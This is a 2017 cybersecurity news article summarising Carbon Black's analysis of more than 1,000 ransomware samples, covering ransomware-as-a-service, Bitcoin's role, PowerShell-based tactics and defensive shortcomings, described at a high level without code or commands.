DTX Manchester DTX Manchester
  • About Us
Wednesday, 3 March, 2021
IT Security Guru
CTX Manchester 2020 banner ad
  • Home
  • Features
  • Insight
  • Events
    • Women in Cyber 2020
    • Women in Cyber 2020 [SPONSORS]
  • Topics
    • Cloud Security
    • Cyber Crime
    • Cyber Warfare
    • Data Protection
    • DDoS
    • Hacking
    • Malware, Phishing and Ransomware
    • Mobile Security
    • Network Security
    • Regulation
    • Skills Gap
    • The Internet of Things
    • Threat Detection
    • AI and Machine Learning
    • Industrial Internet of Things
  • Multimedia
  • Product Reviews
  • About Us
No Result
View All Result
  • Home
  • Features
  • Insight
  • Events
    • Women in Cyber 2020
    • Women in Cyber 2020 [SPONSORS]
  • Topics
    • Cloud Security
    • Cyber Crime
    • Cyber Warfare
    • Data Protection
    • DDoS
    • Hacking
    • Malware, Phishing and Ransomware
    • Mobile Security
    • Network Security
    • Regulation
    • Skills Gap
    • The Internet of Things
    • Threat Detection
    • AI and Machine Learning
    • Industrial Internet of Things
  • Multimedia
  • Product Reviews
  • About Us
No Result
View All Result
IT Security Guru
No Result
View All Result

Mass-Scale Ransomware Attacks Providing Hackers the Ability to Earn Quick Money

by The Gurus
September 22, 2017
in This Week's Gurus
ransomware
Share on FacebookShare on Twitter

During the past six months, the Carbon Black Threat Analysis Unit (TAU) analysed more than 1,000 ransomware samples, categorising them into 150 families, and found the following:

  • Attackers are looking to make quick, easy money with unsophisticated malware combined with sophisticated delivery methods. The majority of today’s ransomware aims to target the largest vulnerable population possible.
  • “Ransomware as a Service (RaaS)” and the emergence of Bitcoin have lowered the barrier to entry even further for attackers.
  • Some ransomware is beginning to implement non-malware tactics that leverage “trusted” native tools, such as Microsoft’s PowerShell. These tools can be used in the propagation of the ransomware as well as file encryption.
  • Nearly 99% of ransomware attacks we analysed targeted Microsoft products. Mac users were largely untouched by the ransomware samples we researched.

 
Overview
If global headlines in recent months are to be believed, ransomware’s increased ubiquity and sophistication have reached epidemic proportions. According to these reports, malware such as WannaCry and NotPetya have thrust ransomware into the public’s consciousness in an unprecedented fashion, while businesses around the globe scramble to keep up with the onslaught of attacks.
While it’s true that ransomware is more ubiquitous today than ever, a different reality exists when it comes to sophistication. According to a recent analysis of a large set of ransomware families by the Carbon Black TAU, the majority of today’s ransomware errs on the side of simplicity in an effort to target a mass set of victims as easily and quickly as possible. The net? Attackers are looking to make quick, easy money with unsophisticated malware, combined with sophisticated delivery methods.
To understand the world of ransomware, Carbon Black examined a sample set of more than 150 ransomware families. Our analysis reveals the majority of ransomware attacks are guided by simple economics and likely derive from unsophisticated actors who often leverage pre-existing do-it-yourself (DIY) attack kits purchased from the dark web.
Those who are striking out on their own also tend to use more basic programming languages, such as .NET, and reuse code from open-source projects and websites.
Episodic ransomware attacks, such as NotPetya, have made for splashy headlines, but reveal more about the general unpreparedness of worldwide businesses to handle these attacks than they do about a sophisticated evolution of ransomware. These attacks highlight that the industry at large is often failing to do infosec basics, such as patching.
Businesses appear to be focusing too greatly on next-generation threats while being unable to defend against the current era of basic malware. What’s more, the public attention to new threats distracts many organisations from the ability to tool their environments and train their staff to respond to basic attacks.
The level of effort needed to secure environments seems so daunting to many in leadership that an investment in response and recovery would appear to be a better investment. As ransomware grew in prevalence, many businesses accepted the risk of individual machines getting infected and losing localised data. These businesses implemented policies to quickly reimage the machine with its most recent backup and move on.
However, malware such as WannaCry and NotPetya have changed that equation by including worm functionality to spread across networks. Reimaging a single infected system was ineffective if the ransomware was able to quickly move across the network and infect additional systems. Businesses that had accepted the risk of handling few ransomware incidents now risked losing complete networks. This was seen in various British hospitals where operations were shut down completely while ransomware automatically spread itself across a widely vulnerable network.
However, just as NotPetya was incrementally more sophisticated compared to WannaCry, the Carbon Black TAU expects a rising-tide evolution of ransomware in the coming months as attackers attempt to further extort money from unprepared businesses and consumers.
While the defences required to limit the spread and damage of ransomware could be easy to determine, their deployment across large organisations provide a challenge for many security teams. As ransomware becomes more sophisticated over time, such challenges only increase.
Security teams will have to implement better lines of defence to detect complex malware and adversaries using non-malware attacks to encrypt data. The development of more sophisticated malware isn’t then limited to single adversaries; Ransomware-as-a-Service (RaaS) operators can deploy a single, complex malware to hundreds of thousands of potential victims at a time.
 
A Deeper Look at Ransomware
For this research, the Carbon Black TAU analysed more than 1,000 ransomware samples, categorising them into more than 150 distinct families. Ransomware, like most other malware applications, can be grouped based upon its development characteristics; methods of injection; and unique techniques, tactics, and procedures (TTPs).
These attributes suggest that each group was designed by the same set of developers for the same purpose. Each family could be unique in the encryption routine it uses, the files it targets, the style of ransom note it provides, or even the method in which it collects its ransom.
Our research highlighted some interesting trends:

  • Most of ransomware samples we evaluated are designed to run in place. Without the need for installation or configuration, these samples will start encrypting data immediately after execution. This is in contrast to less frequently seen families that perform more elaborate installation methods before malicious activity starts.
  • Some ransomware families (for example Abpodul) leveraged non-malware tactics. Characterised by files that would not be detected as malicious by legacy antivirus, these threats leverage “trusted” native tools, such as Microsoft’s PowerShell, to delete Volume Shadow Copies and encrypt files. More prevalent malware even used PowerShell as a means to download and run the actual ransomware executable.
  • Ransomware code is less complex than many other forms of malware. A basic ransomware sample simply needs to traverse folders and encrypt files using standard Windows routines. There is very little coding involved to make ransomware, and much of that code can be sourced from other online projects.
  • Attackers are playing a numbers game to launch a mass set of attacks against the largest vulnerable population possible. “Ransomware as a Service’” (RaaS) and the emergence of Bitcoin have lowered the barrier to entry for attackers using ransomware. Bitcoin and ransomware are very clearly closely tied, with ransomware experiencing triple digit percentage growth since Bitcoin’s founding in 2009.
  • By using underground markets and the dark web, Ransomware-as-a-Service provides an adversary with no technical experience the ability to easily sponsor a ransomware campaign with available funds.
  • These “spray and pray” attacks often rely on spamming and phishing campaigns to guarantee a small percentage of infections to extort money. Similar to many spam campaigns, ransomware has been sent en masse to thousands of email addresses at a single organisation, requiring just one person to execute the payload for a successful attack.
  • 99% of ransomware attacks target Microsoft products given Microsoft’s large market share. Mac users were virtually untouched by the ransomware samples we researched. In fact, we found only a small handful of families targeting MacOS. One of those was destructive-ware due to it never sending the encryption key to any command and control server.
  • The majority of ransomware samples were written in English, a default language for Microsoft Windows products. We also came across samples written in French, German, Chinese, Japanese, and Russian.
  • The trend toward rudimentary ransomware speaks to the current state of cyber defence. On one hand, organisations with nascent (or non-existing) security programmes have been unable to prevent even the most basic attacks. For more robust security teams, the focus on advanced, targeted attacks has potentially detracted from the routine “blocking and tackling” required to stop even attacks that have limited sophistication.
  • Traditional defences are heavily skewed to detecting and blocking malicious files downloaded to a computer system. A reliance on this method distracts defenders from seemingly legitimate applications exhibiting malicious behavior. Many ransomware attacks are using existing tools on the machine, (e.g. PowerShell.)
  • File-based solutions that focus on static indicators of files such as file names, unique strings, and hashes, are missing ransomware attacks as they don’t have visibility into the “DNA” of an attack. Without tracking malicious behaviour and intent, such defensive methods could be unable to accurately predict future attacks involving volatile code leveraging such tools as Javascript, PowerShell, Visual Basic, and Active Server Pages (ASP).
0 0 vote
Article Rating
FacebookTweetLinkedIn
Tags: BreachCybercyberattackcybersecurityMalwareRansomwaretech
ShareTweetShare
Previous Post

Beyond the Phish Report from Wombat Security Reveals the No. 1 Problem Area for End-Users is Protecting Confidential Information

Next Post

Viewpoint from the Biometrics Institute – Spoof or proof?

Subscribe
Notify of
guest
guest
0 Comments
Inline Feedbacks
View all comments

Recent News

Top 10 awards to enter for cybersecurity 

March 3, 2021
Medal

Identity theft: US Congressional Medal of Honor

March 3, 2021
Dripping tap

Learning from past hacking attacks

March 2, 2021
Twitter Logo

Twitter tightens rules on the spread of misinformation

March 2, 2021

The IT Security Guru offers a daily news digest of all the best breaking IT security news stories first thing in the morning! Rather than you having to trawl through all the news feeds to find out what’s cooking, you can quickly get everything you need from this site!

Our Address: 10 London Mews, London, W2 1HY

Follow Us

© 2015 - 2019 IT Security Guru - Website Managed by Calm Logic

  • About Us
No Result
View All Result
  • Home
  • Features
  • Insight
  • Events
    • Women in Cyber 2020
    • Women in Cyber 2020 [SPONSORS]
  • Topics
    • Cloud Security
    • Cyber Crime
    • Cyber Warfare
    • Data Protection
    • DDoS
    • Hacking
    • Malware, Phishing and Ransomware
    • Mobile Security
    • Network Security
    • Regulation
    • Skills Gap
    • The Internet of Things
    • Threat Detection
    • AI and Machine Learning
    • Industrial Internet of Things
  • Multimedia
  • Product Reviews
  • About Us

© 2015 - 2019 IT Security Guru - Website Managed by Calm Logic

This site uses functional cookies and external scripts to improve your experience.

More information
wpDiscuz
0
0
Would love your thoughts, please comment.x
()
x
| Reply
Privacy Settings / PENDINGGDPR Compliance

Privacy Settings / PENDING

This site uses functional cookies and external scripts to improve your experience. Which cookies and scripts are used and how they impact your visit is specified on the left. You may change your settings at any time. Your choices will not impact your visit.

NOTE: These settings will only apply to the browser and device you are currently using.

GDPR Compliance

Accept